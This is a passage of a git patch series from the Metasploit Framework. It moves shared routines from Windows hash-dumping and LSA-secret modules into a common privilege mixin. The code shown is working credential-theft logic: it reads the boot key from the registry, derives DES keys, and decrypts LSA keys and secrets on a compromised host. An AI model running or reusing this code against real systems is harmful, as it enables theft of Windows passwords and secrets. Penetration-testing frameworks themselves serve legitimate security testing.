+++ b/modules/post/windows/gather/cachedump.rb
@@ -12,6 +12,7 @@ require 'rex'
 
 class Metasploit3 < Msf::Post
 
+  include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Registry
 
   def initialize(info={})
@@ -52,28 +53,6 @@ class Metasploit3 < Msf::Post
     end
   end
 
-  def capture_boot_key
-    bootkey = ""
-    basekey = "System\\CurrentControlSet\\Control\\Lsa"
-
-    %W{JD Skew1 GBG Data}.each do |k|
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
-      return nil if not ok
-      bootkey << [ok.query_class.to_i(16)].pack("V")
-      ok.close
-    end
-
-    keybytes = bootkey.unpack("C*")
-    descrambled = ""
-    descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
-
-    0.upto(keybytes.length-1) do |x|
-      descrambled << [keybytes[descrambler[x]]].pack("C")
-    end
-
-    return descrambled
-  end
-
   def capture_lsa_key(bootkey)
     begin
       print_status("Getting PolSecretEncryptionKey...") if( datastore['DEBUG'] )
diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb
index 07f6662105..183c980e37 100644
--- a/modules/post/windows/gather/hashdump.rb
+++ b/modules/post/windows/gather/hashdump.rb
@@ -12,7 +12,9 @@ require 'msf/core/auxiliary/report'
 class Metasploit3 < Msf::Post
 
   include Msf::Auxiliary::Report
+  include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Registry
+  
   def initialize(info={})
     super( update_info( info,
       'Name'          => 'Windows Gather Local User Account Password Hashes (Registry)',
@@ -121,29 +123,6 @@ class Metasploit3 < Msf::Post
     end
   end
 
-  def capture_boot_key
-    bootkey = ""
-    basekey = "System\\CurrentControlSet\\Control\\Lsa"
-    %W{JD Skew1 GBG Data}.each do |k|
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
-      return nil if not ok
-      bootkey << [ok.query_class.to_i(16)].pack("V")
-      ok.close
-    end
-
-    keybytes    = bootkey.unpack("C*")
-    descrambled = ""
-  #	descrambler = [ 0x08, 0x05, 0x04, 0x02, 0x0b, 0x09, 0x0d, 0x03, 0x00, 0x06, 0x01, 0x0c, 0x0e, 0x0a, 0x0f, 0x07 ]
-    descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
-
-    0.upto(keybytes.length-1) do |x|
-      descrambled << [ keybytes[ descrambler[x] ] ].pack("C")
-    end
-
-
-    descrambled
-  end
-
   def capture_hboot_key(bootkey)
     ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account", KEY_READ)
     return if not ok
diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb
index 15c417c1e8..569d409932 100644
--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -75,29 +75,6 @@ class Metasploit3 < Msf::Post
     smart_hash_dump(datastore['GETSYSTEM'], hash_file)
   end
 
-
-  def capture_boot_key
-    bootkey = ""
-    basekey = "System\\CurrentControlSet\\Control\\Lsa"
-    %W{JD Skew1 GBG Data}.each do |k|
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
-      return nil if not ok
-      bootkey << [ok.query_class.to_i(16)].pack("V")
-      ok.close
-    end
-
-    keybytes    = bootkey.unpack("C*")
-    descrambled = ""
-    #	descrambler = [ 0x08, 0x05, 0x04, 0x02, 0x0b, 0x09, 0x0d, 0x03, 0x00, 0x06, 0x01, 0x0c, 0x0e, 0x0a, 0x0f, 0x07 ]
-    descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
-
-    0.upto(keybytes.length-1) do |x|
-      descrambled << [ keybytes[ descrambler[x] ] ].pack("C")
-    end
-
-
-    descrambled
-  end
   #-------------------------------------------------------------------------------
 
   def capture_hboot_key(bootkey)

From 26d07c0689084eb153333ef115f51e53db5ce9fe Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 23:35:14 -0400
Subject: [PATCH 010/217] add a needed -end

---
 modules/post/windows/gather/credentials/lsa.rb | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index c7c83a6ee9..06230d45a5 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -190,11 +190,11 @@ class Metasploit3 < Msf::Post
     root_key = "HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\"
 
     key_arr = meterpreter_registry_enumkeys(root_key)
+
     key_arr.each do |keys|
       mid_key = root_key + "\\" +  keys
       sk_arr = meterpreter_registry_enumkeys(mid_key)
       sk_arr.each do |mkeys|
-
         #CurrVal stores the currently set value of the key, in the case of
         #services it usually come out as plan text
         if(mkeys == "CurrVal")
@@ -232,6 +232,7 @@ class Metasploit3 < Msf::Post
           end
         end
       end
+    end
     return sec_str
   end
 

From 1a9fcf2cbbb4d590f8beab482938f2bbe829e1b5 Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 23:39:07 -0400
Subject: [PATCH 011/217] move convert_des_56_to_64 to priv

---
 lib/msf/core/post/windows/priv.rb             | 42 +++++++++++++++++++
 modules/post/windows/gather/cachedump.rb      | 39 -----------------
 .../post/windows/gather/credentials/lsa.rb    | 40 ------------------
 modules/post/windows/gather/hashdump.rb       | 42 +------------------
 modules/post/windows/gather/smart_hashdump.rb | 40 ------------------
 5 files changed, 43 insertions(+), 160 deletions(-)

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 689574f20c..37e822dcfe 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -109,4 +109,46 @@ module Msf::Post::Windows::Priv
     return descrambled
   end
 
+  #
+  # Converts DES 56 to DES 64
+  #
+  def convert_des_56_to_64(kstr)
+    des_odd_parity = [
+      1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
+      16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
+      32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
+      49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
+      64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
+      81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
+      97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
+      112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
+      128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
+      145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
+      161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
+      176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
+      193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
+      208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
+      224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
+      241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
+    ]
+
+    key = []
+    str = kstr.unpack("C*")
+
+    key[0] = str[0] >> 1
+    key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2)
+    key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3)
+    key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4)
+    key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5)
+    key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6)
+    key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7)
+    key[7] = str[6] & 0x7F
+
+    0.upto(7) do |i|
+      key[i] = ( key[i] << 1)
+      key[i] = des_odd_parity[key[i]]
+    end
+    return key.pack("C*")
+  end
+
 end
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index aeb74cd770..5fcccd8aae 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -91,45 +91,6 @@ class Metasploit3 < Msf::Post
     return lsakey
   end
 
-  def convert_des_56_to_64(kstr)
-    des_odd_parity = [
-      1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
-      16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
-      32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
-      49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
-      64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
-      81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
-      97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
-      112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
-      128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
-      145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
-      161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
-      176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
-      193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
-      208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
-      224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
-      241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
-    ]
-
-    key = []
-    str = kstr.unpack("C*")
-
-    key[0] = str[0] >> 1
-    key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2)
-    key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3)
-    key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4)
-    key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5)
-    key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6)
-    key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7)
-    key[7] = str[6] & 0x7F
-
-    0.upto(7) do |i|
-      key[i] = ( key[i] << 1)
-      key[i] = des_odd_parity[key[i]]
-    end
-    return key.pack("C*")
-  end
-
   def decrypt_secret(secret, key)
 
     # Ruby implementation of SystemFunction005
diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 06230d45a5..8d472d479b 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -70,46 +70,6 @@ class Metasploit3 < Msf::Post
     return lsakey
   end
 
-  def convert_des_56_to_64(kstr)
-    des_odd_parity = [
-      1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
-      16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
-      32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
-      49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
-      64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
-      81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
-      97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
-      112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
-      128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
-      145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
-      161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
-      176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
-      193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
-      208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
-      224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
-      241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
-    ]
-
-    key = []
-    str = kstr.unpack("C*")
-
-    key[0] = str[0] >> 1
-    key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2)
-    key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3)
-    key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4)
-    key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5)
-    key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6)
-    key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7)
-    key[7] = str[6] & 0x7F
-
-    0.upto(7) do |i|
-      key[i] = ( key[i] << 1)
-      key[i] = des_odd_parity[key[i]]
-    end
-    return key.pack("C*")
-  end
-
-
   def decrypt_secret(secret, key)
 
     # Ruby implementation of SystemFunction005
diff --git a/modules/post/windows/gather/hashdump.rb b/modules/post/windows/gather/hashdump.rb
index 183c980e37..5532600047 100644
--- a/modules/post/windows/gather/hashdump.rb
+++ b/modules/post/windows/gather/hashdump.rb
@@ -14,7 +14,7 @@ class Metasploit3 < Msf::Post
   include Msf::Auxiliary::Report
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Registry
-  
+
   def initialize(info={})
     super( update_info( info,
       'Name'          => 'Windows Gather Local User Account Password Hashes (Registry)',
@@ -33,25 +33,6 @@ class Metasploit3 < Msf::Post
     @sam_empty_lm = ["aad3b435b51404eeaad3b435b51404ee"].pack("H*")
     @sam_empty_nt = ["31d6cfe0d16ae931b73c59d7e0c089c0"].pack("H*")
 
-    @des_odd_parity = [
-      1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
-      16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
-      32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
-      49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
-      64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
-      81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
-      97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
-      112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
-      128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
-      145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
-      161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
-      176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
-      193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
-      208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
-      224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
-      241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
-    ]
-
   end
 
   def run
@@ -221,27 +202,6 @@ class Metasploit3 < Msf::Post
     d_string
   end
 
-  def convert_des_56_to_64(kstr)
-    key = []
-    str = kstr.unpack("C*")
-
-    key[0] = str[0] >> 1
-    key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2)
-    key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3)
-    key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4)
-    key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5)
-    key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6)
-    key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7)
-    key[7] = str[6] & 0x7F
-
-    0.upto(7) do |i|
-      key[i] = ( key[i] << 1)
-      key[i] = @des_odd_parity[key[i]]
-    end
-
-    key.pack("C*")
-  end
-
   def rid_to_key(rid)
 
     s1 = [rid].pack("V")
diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb
index 569d409932..ce5a9698df 100644
--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -44,24 +44,6 @@ class Metasploit3 < Msf::Post
     @sam_empty_lm = ["aad3b435b51404eeaad3b435b51404ee"].pack("H*")
     @sam_empty_nt = ["31d6cfe0d16ae931b73c59d7e0c089c0"].pack("H*")
 
-    @des_odd_parity = [
-      1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
-      16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
-      32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
-      49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
-      64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
-      81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
-      97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
-      112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
-      128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
-      145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
-      161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
-      176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
-      193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
-      208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
-      224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
-      241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
-    ]
   end
 
   # Run Method for when run command is issued
@@ -179,28 +161,6 @@ class Metasploit3 < Msf::Post
   end
   #-------------------------------------------------------------------------------
 
-  def convert_des_56_to_64(kstr)
-    key = []
-    str = kstr.unpack("C*")
-
-    key[0] = str[0] >> 1
-    key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2)
-    key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3)
-    key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4)
-    key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5)
-    key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6)
-    key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7)
-    key[7] = str[6] & 0x7F
-
-    0.upto(7) do |i|
-      key[i] = ( key[i] << 1)
-      key[i] = @des_odd_parity[key[i]]
-    end
-
-    key.pack("C*")
-  end
-  #-------------------------------------------------------------------------------
-
   def rid_to_key(rid)
 
     s1 = [rid].pack("V")

From 60d8ee14349b81182a88bbb0fdf606c09ddcbd7f Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 23:45:28 -0400
Subject: [PATCH 012/217] move capture_lsa_key to priv

---
 lib/msf/core/post/windows/priv.rb             | 44 +++++++++++++++++++
 modules/post/windows/gather/cachedump.rb      | 38 ----------------
 .../post/windows/gather/credentials/lsa.rb    | 40 -----------------
 3 files changed, 44 insertions(+), 78 deletions(-)

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 37e822dcfe..6b773fbcc3 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -151,4 +151,48 @@ module Msf::Post::Windows::Priv
     return key.pack("C*")
   end
 
+  #
+  # Returns the LSA key upon input of the unscrambled bootkey
+  #
+  def capture_lsa_key(bootkey)
+    begin
+      vprint_status("Getting PolSecretEncryptionKey...")
+      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
+      pol = ok.query_value("").data
+      vprint_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}")
+      ok.close
+      print_status("XP or below client")
+      @vista = 0
+    rescue
+      vprint_status("Trying 'V72' style...")
+      vprint_status("Getting PolEKList...")
+      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
+      pol = ok.query_value("").data
+      vprint_good("Pol: #{pol.unpack("H*")[0]}")
+      ok.close
+      print_status("Vista or above client")
+      @vista = 1
+    end
+
+    if( @vista == 1 )
+      lsakey = decrypt_lsa(pol, bootkey)
+      lsakey = lsakey[68,32]
+      vprint_good(lsakey.unpack("H*")[0])
+    else
+      md5x = Digest::MD5.new()
+      md5x << bootkey
+      (1..1000).each do
+        md5x << pol[60,16]
+      end
+
+      rc4 = OpenSSL::Cipher::Cipher.new("rc4")
+      rc4.key = md5x.digest
+      lsakey  = rc4.update(pol[12,48])
+      lsakey << rc4.final
+      lsakey = lsakey[0x10..0x1F]
+    end
+    return lsakey
+  end
+
+
 end
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index 5fcccd8aae..616030f2c4 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -53,44 +53,6 @@ class Metasploit3 < Msf::Post
     end
   end
 
-  def capture_lsa_key(bootkey)
-    begin
-      print_status("Getting PolSecretEncryptionKey...") if( datastore['DEBUG'] )
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
-      pol = ok.query_value("").data
-      print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}") if( datastore['DEBUG'] )
-      ok.close
-      print_status("XP compatible client")
-      @vista = 0
-    rescue
-      print_status("Trying 'Vista' style...")
-      print_status("Getting PolEKList...") if( datastore['DEBUG'] )
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
-      pol = ok.query_value("").data
-      ok.close
-      print_status("Vista compatible client")
-      @vista = 1
-    end
-
-    if( @vista == 1 )
-      lsakey = decrypt_lsa(pol, bootkey)
-      lsakey = lsakey[68,32]
-    else
-      md5x = Digest::MD5.new()
-      md5x << bootkey
-      (1..1000).each do
-        md5x << pol[60,16]
-      end
-
-      rc4 = OpenSSL::Cipher::Cipher.new("rc4")
-      rc4.key = md5x.digest
-      lsakey	= rc4.update(pol[12,48])
-      lsakey << rc4.final
-      lsakey = lsakey[0x10..0x1F]
-    end
-    return lsakey
-  end
-
   def decrypt_secret(secret, key)
 
     # Ruby implementation of SystemFunction005
diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 8d472d479b..772eab3e7d 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -30,46 +30,6 @@ class Metasploit3 < Msf::Post
     ))
   end
 
-  def capture_lsa_key(bootkey)
-    begin
-      #print_status("Getting PolSecretEncryptionKey...")
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
-      pol = ok.query_value("").data
-      #print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}")
-      ok.close
-      print_status("XP compatible client")
-      @vista = 0
-    rescue
-      #print_status("Trying 'V72' style...")
-      #print_status("Getting PolEKList...")
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
-      pol = ok.query_value("").data
-      #print_good("Pol: #{pol.unpack("H*")[0]}")
-      ok.close
-      print_status("V/7/2k8 compatible client")
-      @vista = 1
-    end
-
-    if( @vista == 1 )
-      lsakey = decrypt_lsa(pol, bootkey)
-      lsakey = lsakey[68,32]
-      #print_good(lsakey.unpack("H*")[0])
-    else
-      md5x = Digest::MD5.new()
-      md5x << bootkey
-      (1..1000).each do
-        md5x << pol[60,16]
-      end
-
-      rc4 = OpenSSL::Cipher::Cipher.new("rc4")
-      rc4.key = md5x.digest
-      lsakey  = rc4.update(pol[12,48])
-      lsakey << rc4.final
-      lsakey = lsakey[0x10..0x1F]
-    end
-    return lsakey
-  end
-
   def decrypt_secret(secret, key)
 
     # Ruby implementation of SystemFunction005

From 541d932d776cfe7cfdddea6565bfd8473b824856 Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 23:53:33 -0400
Subject: [PATCH 013/217] move decrypt_lsa to priv as well

---
 lib/msf/core/post/windows/priv.rb             | 28 +++++++++++++++++++
 modules/post/windows/gather/cachedump.rb      | 25 -----------------
 .../post/windows/gather/credentials/lsa.rb    | 27 ------------------
 3 files changed, 28 insertions(+), 52 deletions(-)

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 6b773fbcc3..6cff475da9 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -194,5 +194,33 @@ module Msf::Post::Windows::Priv
     return lsakey
   end
 
+  #
+  # Decrypts the LSA key
+  #
+  def decrypt_lsa(pol, encryptedkey)
+
+    sha256x = Digest::SHA256.new()
+    sha256x << encryptedkey
+    (1..1000).each do
+      sha256x << pol[28,32]
+    end
+
+    aes = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
+    aes.key = sha256x.digest
+
+    vprint_status("digest #{sha256x.digest.unpack("H*")[0]}")
+
+    decryptedkey = ''
+
+    for i in (60...pol.length).step(16)
+      aes.decrypt
+      aes.padding = 0
+      xx = aes.update(pol[i...i+16])
+      decryptedkey += xx
+    end
+    vprint_good("Dec_Key #{decryptedkey}")
+
+    return decryptedkey
+  end
 
 end
diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index 616030f2c4..76d1c02aa2 100644
--- a/modules/post/windows/gather/cachedump.rb
+++ b/modules/post/windows/gather/cachedump.rb
@@ -83,31 +83,6 @@ class Metasploit3 < Msf::Post
 
   end
 
-  def decrypt_lsa(pol, encryptedkey)
-
-    sha256x = Digest::SHA256.new()
-    sha256x << encryptedkey
-    (1..1000).each do
-      sha256x << pol[28,32]
-    end
-
-    aes = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
-    aes.key = sha256x.digest
-
-    print_status("digest #{sha256x.digest.unpack("H*")[0]}") if( datastore['DEBUG'] )
-
-    decryptedkey = ''
-
-    for i in (60...pol.length).step(16)
-      aes.decrypt
-      aes.padding = 0
-      xx = aes.update(pol[i...i+16])
-      decryptedkey += xx
-    end
-
-    return decryptedkey
-  end
-
   def capture_nlkm(lsakey)
     ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", KEY_READ)
     nlkm = ok.query_value("").data
diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 772eab3e7d..36092f189f 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -60,33 +60,6 @@ class Metasploit3 < Msf::Post
 
   end
 
-  def decrypt_lsa(pol, encryptedkey)
-
-    sha256x = Digest::SHA256.new()
-    sha256x << encryptedkey
-    (1..1000).each do
-      sha256x << pol[28,32]
-    end
-
-    aes = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
-    aes.key = sha256x.digest
-
-    vprint_status("digest #{sha256x.digest.unpack("H*")[0]}")
-
-    decryptedkey = ''
-
-    for i in (60...pol.length).step(16)
-      aes.decrypt
-      aes.padding = 0
-      xx = aes.update(pol[i...i+16])
-      decryptedkey += xx
-    end
-    vprint_good("Dec_Key #{decryptedkey}")
-
-    return decryptedkey
-  end
-
-
   def reg_getvaldata(key,valname)
     v = nil
     begin

From 8f2ba689343552fbfe04df7b7589871865bdace8 Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Thu, 17 Oct 2013 00:04:21 -0400
Subject: [PATCH 014/217] move decrypt_lsa and decrypt_secret to priv too

---
 lib/msf/core/post/windows/priv.rb             | 45 ++++++++++++++++---
 modules/post/windows/gather/cachedump.rb      | 34 +-------------
 .../post/windows/gather/credentials/lsa.rb    | 34 +-------------
 3 files changed, 42 insertions(+), 71 deletions(-)

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 6cff475da9..831120b5f0 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -175,7 +175,7 @@ module Msf::Post::Windows::Priv
     end
 
     if( @vista == 1 )
-      lsakey = decrypt_lsa(pol, bootkey)
+      lsakey = decrypt_lsa_data(pol, bootkey)
       lsakey = lsakey[68,32]
       vprint_good(lsakey.unpack("H*")[0])
     else
@@ -195,9 +195,9 @@ module Msf::Post::Windows::Priv
   end
 
   #
-  # Decrypts the LSA key
+  # Decrypts the LSA encrypted data
   #
-  def decrypt_lsa(pol, encryptedkey)
+  def decrypt_lsa_data(pol, encryptedkey)
 
     sha256x = Digest::SHA256.new()
     sha256x << encryptedkey
@@ -210,17 +210,48 @@ module Msf::Post::Windows::Priv
 
     vprint_status("digest #{sha256x.digest.unpack("H*")[0]}")
 
-    decryptedkey = ''
